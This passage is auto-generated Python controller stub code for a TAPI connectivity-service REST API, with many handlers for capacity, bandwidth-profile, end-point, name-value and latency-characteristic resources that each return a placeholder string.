def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete
removes tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get
returns tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonBandwidthProfile
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post(uuid, local_id, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post
creates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added to list
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put(uuid, local_id, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put
creates or updates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added or updated
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_delete
removes tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_get
returns tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacity
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_post(uuid, local_id, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_post
creates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity: tapi.common.Capacity to be added to list
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_put(uuid, local_id, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_put
creates or updates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity: tapi.common.Capacity to be added or updated
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, local_id, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param topology_uuid: Id of connection-end-point
:type topology_uuid: str
:param node_uuid: Id of connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_delete
removes tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_get
returns tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiConnectivityConnectivityserviceEndPoint
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_name_post(uuid, local_id, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_delete(uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_get(uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_post(uuid, local_id, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_put(uuid, local_id, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_post(uuid, local_id, tapi_connectivity_connectivityservice_end_point=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_post
creates tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_connectivity_connectivityservice_end_point: tapi.connectivity.connectivityservice.EndPoint to be added to list
:type tapi_connectivity_connectivityservice_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivityservice_end_point = TapiConnectivityConnectivityserviceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_put(uuid, local_id, tapi_connectivity_connectivityservice_end_point=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_put
creates or updates tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_connectivity_connectivityservice_end_point: tapi.connectivity.connectivityservice.EndPoint to be added or updated
:type tapi_connectivity_connectivityservice_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivityservice_end_point = TapiConnectivityConnectivityserviceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_delete
removes tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_get
returns tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonServiceInterfacePointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_post(uuid, local_id, tapi_common_service_interface_point_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_post
creates tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_service_interface_point_ref: tapi.common.ServiceInterfacePointRef to be added to list
:type tapi_common_service_interface_point_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_service_interface_point_ref = TapiCommonServiceInterfacePointRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_put(uuid, local_id, tapi_common_service_interface_point_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_put
creates or updates tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_service_interface_point_ref: tapi.common.ServiceInterfacePointRef to be added or updated
:type tapi_common_service_interface_point_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_service_interface_point_ref = TapiCommonServiceInterfacePointRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_exclude_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_exclude_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of exclude-link
:type topology_uuid: str
:param link_uuid: Id of exclude-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_exclude_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_exclude_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of exclude-node
:type topology_uuid: str
:param node_uuid: Id of exclude-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_exclude_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_exclude_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param path_uuid: Id of exclude-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_get
returns tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiConnectivityConnectivitycontextConnectivityService
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of include-link
:type topology_uuid: str
:param link_uuid: Id of include-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of include-node
:type topology_uuid: str
:param node_uuid: Id of include-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param path_uuid: Id of include-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of include-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristic_post(uuid, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristic_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_delete(uuid, traffic_property_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_delete
removes tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_get(uuid, traffic_property_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_get
returns tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: TapiTopologyLatencyCharacteristic
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_post(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_put(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_put
creates or updates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added or updated
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
